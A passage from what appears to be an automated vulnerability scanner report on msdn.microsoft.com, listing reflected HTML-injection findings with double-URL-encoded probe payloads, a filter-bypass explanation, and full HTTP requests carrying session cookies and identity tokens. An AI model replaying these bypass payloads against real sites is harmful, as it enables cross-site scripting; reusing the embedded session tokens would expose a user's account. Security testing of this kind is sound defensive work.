Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us56fbf"><a>18d7c0c0b34/library/dd208104(PROT.10" />
...[SNIP]...

2.41. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45d7%2522%253e%253ca%253e649622910d4 was submitted in the REST URL parameter 2. This input was echoed as a45d7"><a>649622910d4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya45d7%2522%253e%253ca%253e649622910d4/dd208104(PROT.10 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9216
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya45d7"><a>649622910d4/dd208104(PROT.10" />
...[SNIP]...

2.42. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 797d1%2522%253e%253ca%253e5235629b1dd was submitted in the REST URL parameter 3. This input was echoed as 797d1"><a>5235629b1dd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd208104(PROT.10797d1%2522%253e%253ca%253e5235629b1dd HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10797d1"><a>5235629b1dd" />
...[SNIP]...

2.43. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e862a%2522%253e%253ca%253e3fcd2f23dad was submitted in the REST URL parameter 1. This input was echoed as e862a"><a>3fcd2f23dad in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-use862a%2522%253e%253ca%253e3fcd2f23dad/library/dd208104(PROT.10).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9217
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use862a"><a>3fcd2f23dad/library/dd208104(PROT.10)" />
...[SNIP]...

2.44. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a0%2522%253e%253ca%253eb3def3ef286 was submitted in the REST URL parameter 2. This input was echoed as 653a0"><a>b3def3ef286 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library653a0%2522%253e%253ca%253eb3def3ef286/dd208104(PROT.10).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9217
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library653a0"><a>b3def3ef286/dd208104(PROT.10)" />
...[SNIP]...

2.45. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d6f%2522%253e%253ca%253e13799d99661 was submitted in the REST URL parameter 3. This input was echoed as 32d6f"><a>13799d99661 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd208104(PROT.10).aspx32d6f%2522%253e%253ca%253e13799d99661 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 